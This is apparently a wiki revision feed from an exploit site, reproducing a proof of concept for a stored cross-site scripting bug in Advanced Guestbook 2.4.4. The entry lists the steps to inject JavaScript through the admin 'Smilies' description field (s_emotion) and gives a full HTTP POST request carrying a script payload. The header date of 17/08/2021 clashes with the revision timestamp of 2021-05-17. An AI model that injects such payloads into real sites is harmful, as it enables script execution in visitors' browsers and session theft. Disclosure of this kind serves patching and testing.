https://pwnwiki.com/index.php?action=history&feed=atom&title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E
Advanced Guestbook 2.4.4 - 'Smilies' XSS漏洞 - Revision history
2026-04-10T22:32:02Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E&diff=2890&oldid=prev
Pwnwiki: Created page with "==XSS== <pre> # Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS) # Date: 17/08/2021 # Exploit Author: Abdulkadir AYDOGAN # Vendor Home..."
2021-05-17T10:25:31Z
<p>Created page with "==XSS== <pre> # Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS) # Date: 17/08/2021 # Exploit Author: Abdulkadir AYDOGAN # Vendor Home..."</p>
<p><b>New page</b></p><div>==XSS==<br />
<pre><br />
# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)<br />
# Date: 17/08/2021<br />
# Exploit Author: Abdulkadir AYDOGAN<br />
# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook<br />
# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook<br />
# Version: 2.4.4<br />
<br />
Advanced Guestbook is a free open source guestbook script developed in PHP.<br />
Examples of features include email notifications, uploading pictures, html<br />
tags handling, multiple polls, comments and themes.<br />
<br />
#Description<br />
The following is PoC to use the XSS bug with authorized user.<br />
<br />
Firstly there are four part of a emotion object which is :<br />
<br />
- Emotion icon<br />
- Emotion file name<br />
- Emotion command which will be used to call this object (s_code)<br />
- Emotion description (s_emotion)<br />
<br />
Here is the exploitation steps for vulnerability:<br />
<br />
1. Login to your admin account.<br />
2. Go to "Smilies" tab to view and edit emotion icons<br />
3. Click "edit" text in the "Action" column to edit emotions<br />
4. Change emotion description to Javascript code<br />
5. Click the "Submit Settings"<br />
6. Click "Smilies" tab again to view all emotions and Javascript code will<br />
be executed<br />
<br />
# Vulnerable Parameter Type: POST<br />
# Vulnerable Parameter: s_emotion<br />
# Attack Pattern: <script>alert("Smile more!")</script><br />
<br />
#PoC<br />
HTTP Request:<br />
<br />
POST /advancedguestbook/admin.php HTTP/1.1<br />
Host: HOST_ADDRESS<br />
Content-Length: 175<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
Origin: http://HOST_ADDRESS<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36<br />
Accept:<br />
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />
Referer:<br />
http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />
Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;<br />
_gat=1<br />
Connection: close<br />
<br />
s_code=:cool:&s_emotion=<script>alert("Smile<br />
more!")</script>&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1<br />
</pre></div>
Pwnwiki